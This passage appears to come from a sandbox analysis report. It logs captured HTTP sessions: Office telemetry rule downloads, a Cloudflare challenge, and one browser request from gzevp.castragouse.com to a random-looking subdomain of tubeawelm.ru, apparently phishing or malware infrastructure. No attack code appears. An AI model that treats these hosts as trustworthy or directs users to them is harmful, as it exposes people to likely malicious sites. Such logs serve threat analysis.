                                                                                                                                                            cf-chl-out-s: U5TC1L/bOtOmvcS5g69Eb5VfDY1aojfr83qWbV7nkJ513Bs0bmjJ45bp0w8qulfQO6y3AdgJGMog6bFwQW6b0A9k8WBMTdGDDP3H0gXLobpVnQx3RUIAAZumzRjDwufvLcjWX2nm7Pmtxw0D1ltJtLoNLa1v/FShsVAuXIuXbsz6hSeYZRmuH3ahm8PoH2bQfF/cQKX80koYyidO8ra39TcW68jVUpT6Ykp2pd3dk8UJIBznEqkof1qqE2Uf8MKIX3yR91VcxVdK3OYEJ2RM6n86S+02guvL7PspXMEiG8iHQCfauxS2TkTOSdzHqvcAPnpoO3BdYOHjQS2IDu4ZTuVVy3MMp0tiGOhQwdUDl+WN7xHaANLgRn8q8Oq4zC25pJJDzvYKSNI3rkDNuPPsnmmQBLv9zXFimTe3T3ph6I6AvaTgt8mt7tB0zOYrNanWIlP3q+QY+L95uISvNYfzQx7RhiGcMKKQ1oFZJMztv2F8Ywu4/Cd32InH0MlczlZru9ug4uNbUhGvLDOJ7wA79yPrzfuf/5isPTbGOGpen6oghsm19dvGFKqlUwKF5s+c7z7UVQaCbo1H5Dp16DVFL3foXiT2gz1v35SFGoQfAcm9SDQP5gjcfo9STSr8pzEmqOa4x2L7WjiQNbaX5rEoRittGifSZLq7/OJjv8wHGWAEfKSgMGlxLaXicX4ygnvBbhQPkvzFB8sU6E3q2khTYuS4Xgi/GrPofBB966qVdE7jeIxB1lEUCEjL+eV4ZZtyKUdinoZG/AqvH3HKP9XULJ22KCqw+b6zQF6fPNFveJhMYZKG3LgN0n3IV36OjoMVO0T85SGnim1fW7EGdC0OOnsT050hnD6ufCK5GqDXQY5QtD4UOTxcEZIOtvHhhunyf4+3WTTbL60rw4knQxUwgQVZIdRGT8+pJIfwhYA0nrKjGFBZ1f7AZFcAi8oBaY2iiEjFykCZAeTql9vutgKerauVp2Y7$MwrBc4PbsjrBXDxi
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ee3b5e3d43f2-EWR
                                                                                                                                                            2024-10-08 03:09:10 UTC10INData Raw: 75 62 2f 47 6b 70 4b 43 69 36
                                                                                                                                                            Data Ascii: ub/GkpKCi6
                                                                                                                                                            2024-10-08 03:09:10 UTC1369INData Raw: 47 6e 6d 36 43 66 73 4a 4c 47 72 4e 58 55 76 38 33 56 72 4d 2b 62 33 4d 62 5a 6c 37 2f 65 7a 4f 44 5a 30 4d 48 59 35 4f 44 44 72 4d 7a 71 78 75 2f 6d 36 38 57 73 36 75 2f 4a 37 66 47 32 75 50 6a 36 76 64 4f 2f 74 39 4c 6b 33 64 55 46 2b 65 62 56 43 75 63 42 33 2b 66 33 2b 2b 44 6b 36 51 37 64 79 4e 55 52 32 66 44 54 32 39 4d 56 41 66 50 79 45 64 34 68 39 66 41 56 46 78 38 46 2b 52 34 6e 48 51 4d 74 2b 76 6f 44 4e 66 55 47 4e 67 49 70 4c 66 6f 71 43 78 6b 68 44 77 77 62 2b 69 49 51 52 79 51 39 50 79 54 39 50 6b 67 38 42 6b 30 61 51 53 73 70 46 68 38 6f 49 78 6b 79 52 52 52 62 54 54 45 37 50 44 74 57 59 46 34 6b 53 44 4d 6f 51 54 67 31 62 32 31 6f 54 54 31 52 5a 33 46 57 50 33 5a 45 4d 45 74 35 53 58 74 4c 59 56 46 2b 67 6c 74 51 67 31 4a 44 55 6c 74 6e 69
                                                                                                                                                            Data Ascii: Gnm6CfsJLGrNXUv83VrM+b3MbZl7/ezODZ0MHY5ODDrMzqxu/m68Ws6u/J7fG2uPj6vdO/t9Lk3dUF+ebVCucB3+f3++Dk6Q7dyNUR2fDT29MVAfPyEd4h9fAVFx8F+R4nHQMt+voDNfUGNgIpLfoqCxkhDwwb+iIQRyQ9PyT9Pkg8Bk0aQSspFh8oIxkyRRRbTTE7PDtWYF4kSDMoQTg1b21oTT1RZ3FWP3ZEMEt5SXtLYVF+gltQg1JDUltni
                                                                                                                                                            2024-10-08 03:09:10 UTC1369INData Raw: 77 72 4c 47 31 7a 71 72 50 7a 5a 75 78 75 36 76 53 6e 4d 47 63 32 39 54 5a 32 37 54 44 33 36 66 4a 32 73 36 39 7a 4f 66 4d 35 75 71 79 34 38 62 51 39 4f 66 47 2b 74 54 62 38 66 66 68 36 62 72 63 41 66 7a 6a 36 4e 33 78 77 66 76 74 37 75 7a 68 2f 67 6e 76 43 41 63 46 39 51 2f 7a 42 74 62 4e 44 51 33 74 36 50 77 43 46 78 66 37 41 65 45 42 2b 52 51 4c 2b 4f 55 57 2f 4f 38 6f 4a 2b 73 43 4a 69 55 4a 43 66 55 6a 4c 54 4d 36 4c 78 77 30 4b 53 38 41 4a 54 77 77 47 44 74 43 4d 7a 4d 6d 47 54 6c 44 4a 51 34 79 4a 53 30 6e 52 43 56 50 53 6b 35 44 4f 54 67 36 48 43 6f 73 55 42 6f 57 56 30 38 69 49 56 6c 66 4a 55 6c 69 53 47 49 77 54 6d 68 41 59 32 4a 66 4c 32 64 61 61 44 4a 76 63 31 6c 4c 61 7a 68 71 55 58 74 6c 5a 6b 46 70 5a 6d 68 39 53 56 74 32 68 47 57 4c 68 6f
                                                                                                                                                            Data Ascii: wrLG1zqrPzZuxu6vSnMGc29TZ27TD36fJ2s69zOfM5uqy48bQ9OfG+tTb8ffh6brcAfzj6N3xwfvt7uzh/gnvCAcF9Q/zBtbNDQ3t6PwCFxf7AeEB+RQL+OUW/O8oJ+sCJiUJCfUjLTM6Lxw0KS8AJTwwGDtCMzMmGTlDJQ4yJS0nRCVPSk5DOTg6HCosUBoWV08iIVlfJUliSGIwTmhAY2JfL2daaDJvc1lLazhqUXtlZkFpZmh9SVt2hGWLho
                                                                                                                                                            2024-10-08 03:09:10 UTC1369INData Raw: 74 4b 75 79 71 72 69 2f 76 61 48 4d 6e 38 43 37 31 4f 69 7a 77 74 32 71 76 2b 50 6b 37 38 58 4c 71 38 7a 52 30 4e 50 75 74 75 58 58 36 76 72 30 7a 4d 33 4d 34 64 44 6b 33 2f 71 2f 39 76 58 70 2f 67 7a 57 35 77 58 6f 38 50 33 77 42 2b 76 77 36 4f 54 76 43 65 67 50 38 50 72 76 30 65 30 43 41 41 55 4e 48 66 58 77 41 41 54 6b 4a 2b 55 4b 41 51 6e 73 49 78 49 42 4e 42 62 74 4c 41 55 62 43 68 59 49 4b 42 30 68 50 7a 41 41 49 66 77 67 4a 6a 67 53 4f 42 6f 6c 4a 54 63 48 4c 6b 55 38 44 30 63 6c 53 6b 38 70 54 45 34 37 46 45 78 56 55 56 39 4a 53 68 34 74 58 6a 38 65 4a 56 68 49 53 7a 56 4a 56 32 4e 6e 52 31 31 72 56 55 64 6b 52 30 56 6f 61 48 4e 61 61 6d 78 66 58 56 35 76 50 33 78 35 63 6d 5a 6d 55 6d 64 2b 66 34 35 38 62 6d 32 4f 62 57 39 2f 6a 48 46 51 63 5a 70
                                                                                                                                                            Data Ascii: tKuyqri/vaHMn8C71Oizwt2qv+Pk78XLq8zR0NPutuXX6vr0zM3M4dDk3/q/9vXp/gzW5wXo8P3wB+vw6OTvCegP8Prv0e0CAAUNHfXwAATkJ+UKAQnsIxIBNBbtLAUbChYIKB0hPzAAIfwgJjgSOBolJTcHLkU8D0clSk8pTE47FExVUV9JSh4tXj8eJVhISzVJV2NnR11rVUdkR0VoaHNaamxfXV5vP3x5cmZmUmd+f458bm2ObW9/jHFQcZp
                                                                                                                                                            2024-10-08 03:09:10 UTC435INData Raw: 4d 47 77 75 4d 58 4f 78 4d 54 56 31 64 7a 6a 33 64 75 6f 30 4d 58 4e 30 71 7a 49 30 2b 76 42 7a 65 48 58 32 4c 4c 30 79 2f 62 76 32 2f 51 41 7a 50 50 55 33 4d 54 71 36 74 6e 61 37 73 66 77 34 66 76 79 46 41 51 4c 30 2b 55 48 45 42 50 78 43 68 51 58 38 51 6e 38 33 2f 51 42 48 51 67 62 41 41 59 49 42 68 30 6b 36 69 51 65 4b 4f 37 7a 45 69 7a 74 39 78 55 78 48 44 41 78 47 66 6f 33 48 54 6b 56 4c 44 67 36 4a 44 41 37 51 41 4d 56 4b 55 4d 4d 4d 53 31 4a 49 43 45 78 54 41 34 59 4d 6b 35 53 56 45 39 55 50 45 68 55 50 31 59 78 51 31 70 45 51 55 5a 6c 52 79 70 44 61 53 70 78 50 45 74 68 4d 45 78 51 61 54 52 77 56 33 59 31 62 6b 36 41 63 44 74 73 65 47 4e 4f 63 56 5a 65 52 48 52 66 61 59 32 4d 65 57 39 63 6b 47 4a 70 54 49 6c 75 6c 47 5a 6a 56 6e 4e 50 6a 34 6d 68
                                                                                                                                                            Data Ascii: MGwuMXOxMTV1dzj3duo0MXN0qzI0+vBzeHX2LL0y/bv2/QAzPPU3MTq6tna7sfw4fvyFAQL0+UHEBPxChQX8Qn83/QBHQgbAAYIBh0k6iQeKO7zEizt9xUxHDAxGfo3HTkVLDg6JDA7QAMVKUMMMS1JICExTA4YMk5SVE9UPEhUP1YxQ1pEQUZlRypDaSpxPEthMExQaTRwV3Y1bk6AcDtseGNOcVZeRHRfaY2MeW9ckGJpTIlulGZjVnNPj4mh


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            138192.168.2.54986313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1399
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                            x-ms-request-id: 635e2ff4-801e-0035-1973-17752a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030910Z-1657d5bbd48f7nlxc7n5fnfzh000000003z000000000hq64
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:10 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            139192.168.2.54986413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1362
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                            x-ms-request-id: b6ed6057-d01e-0028-3cf9-187896000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030910Z-1657d5bbd48f7nlxc7n5fnfzh0000000040g00000000d0mb
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:10 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            140192.168.2.54986513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1403
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                            x-ms-request-id: 013451e4-b01e-001e-58e7-180214000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030910Z-1657d5bbd4824mj9d6vp65b6n400000004n0000000008up5
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            141192.168.2.54986613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1366
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                            x-ms-request-id: 8a56303a-c01e-0066-0f01-17a1ec000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030910Z-1657d5bbd48gqrfwecymhhbfm80000000380000000007xtd
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            142192.168.2.54986713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1399
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                            x-ms-request-id: cd0b82ba-d01e-0049-1304-17e7dc000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030910Z-1657d5bbd48tnj6wmberkg2xy800000004fg00000000a2mh
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:10 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            143192.168.2.549868104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:09:11 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 7
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-chl-out: W6qPYhcC+0/DV9mP6qAvaAT/H5IE2d1BpGo=$tAhXH8GDNCj2G7xH
                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ee403d70333c-EWR
                                                                                                                                                            2024-10-08 03:09:11 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            144192.168.2.549872172.67.197.2354434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC683OUTGET /6724103732481834739iDJKxIdVFTASTOCRUBILTNCEMENYUDAFTOTURFRKJQVELOZMJKP HTTP/1.1
                                                                                                                                                            Host: lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://gzevp.castragouse.com
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:09:11 UTC707INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGMqVAiuISqrldoZzj7is%2BoqBJVBjz8tf3Ir5nIT%2BdBjTBMtpwMydPkABEaSW%2BJWfMzT%2FDXCI%2BtcSH3YwrD4bwIXpq5Ht9E42BSKsnau9kNLFUmv6%2Fx7dj6wOrZAJA%2Bbo2GiwUZWGRFRviRug5WUlIoqkn6VAqs73nZjVgKjOwLg1IRVAUpH%2BgRoZJs%2B8Y0y73CLcHsO1LzjYqhD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ee410b3c42b5-EWR
                                                                                                                                                            2024-10-08 03:09:11 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                            Data Ascii: 11
                                                                                                                                                            2024-10-08 03:09:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            145192.168.2.54987313.107.246.60443
